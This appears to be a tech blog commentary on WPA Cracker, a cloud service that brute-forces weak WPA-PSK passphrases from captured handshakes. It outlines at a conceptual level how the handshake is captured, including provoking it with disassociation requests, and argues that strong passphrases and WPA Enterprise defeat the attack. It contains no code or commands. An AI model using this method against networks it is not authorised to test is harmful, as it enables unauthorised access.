A clever researcher launches a service that mostly proves how easy it is to crack a bad WPA password: IDG News Service reports that Moxie Marlinspike, a nom de Net for a security researcher, has launched WPA Cracker, a $34 service that cracks poorly chosen passwords found in a database of 135 million passwords in 20 minutes or less using distributed commodity computing. For $17, it takes 40 minutes.
Let me be clear: this is a clever and worthwhile addition to penetration testing (pentesting) and network security, and I would gladly pay $34 to prove to someone smug that his or her company password was vulnerable. But it is not a generic nor dangerous attack on WPA. Smart companies, likely millions of them, already use account-based network authentication in the form of WPA/WPA2 Enterprise, which is not vulnerable to this form of brute-force attack. WPA/WPA2 server-side support is de rigeur in the enterprise network infrastructure, and available from third parties, as well as built into Microsoft Server and Mac OS X Server operating systems. Home users and small-business users are most likely to employ simple passwords.
The ability to crack WPA-PSK (Pre-Shared Key) passwords used in WPA/WPA2 Personal has been well understood since the IEEE 802.11i committee was first nailing down the details of how a password plus other material would be transmuted into a master key used for encryption. Research Robert Moskowitz let me publish his paper, "Weakness in Passphrase Choice in WPA Interface," way back on 4 November 2003, because he wanted to highlight how Wi-Fi equipment makers were letting down users by not guiding them to pick a strong password. Routers now typically come with configuration software that encourages picking a good password and changing the default network name. (That article is still one of the most-read pages on my site six years later.)
To be crackable, keys have to be both short, typically eight or fewer characters, and comprise words found in dictionaries, including alternatives for those words with common substitutions, like a 0 (zero) for the letter O or 3 for E. Longer passwords and ones that use combinations of letters, numbers, and punctuation will remain uncrackable over potentially very long periods of time. WPA cracking becomes something close to exponentially more difficult with each additional letter added to a password. (A generic WPA-PSK crack could change that near-exponential factor, but it hasn't appeared yet.)
As Marlinspike notes in the site's FAQ, a WPA-PSK uses the network's SSID or name as one component, and the network password as the other. The SSID is a salt, which is ostensibly random information added to a password to make extracting the password more difficult. That works quite well in cases in which the salt can't be easily determined; in fact, randomizing the salt for per-packet encryption was one of TKIP's big improvements over WEP.
However, for Wi-Fi, because the SSID is sent in the clear or can be sniffed during an association, someone needs just capture a four-way handshake that's part of the WPA/WPA2 Personal protocol; that handshake can be provoked by sending a disassociation request, too. The disassociation request and handshake take just a moment. A cracker could also monitor a network for such requests, too, which can happen quite frequently as machines rejoin the network.
The 20-minute time is the duration for salting each of 135 million passwords--which Marlinspike says in the FAQ are tuned to be likely ones used for this sort of purpose--and checking the results against the captured handshake. WPA Cracker charges the same $17 or $34 for a recovered password or the answer that the password isn't in the set.
While Marlinspike wouldn't tell IDG which cloud-computing servers he was using, it might be easy to figure out if you do the math. 400 Amazon cloud-computing units of its "standard on-demand instances" running Linux costs precisely $34 per computing hour. That's a little too close to be an accident. Amazon provides an API to allow launching instances with custom made OS images, and charges a full hour at a time, rounding up any partial hours. Thus, Marlinspike breaks even on a single queued job, but sequentially queue work in which the average cracking time is under 20 minutes will produce profit. The researcher can have 400 units fire up and then shut down all while he is sleeping.
You can download precomputed sets of common passwords salted with common SSIDs, but Marlinspike notes in the FAQ that these publicly available sets are limited to 1,000 SSIDs and a million words per set. Someone who enables encryption is likely to change the SSID as well.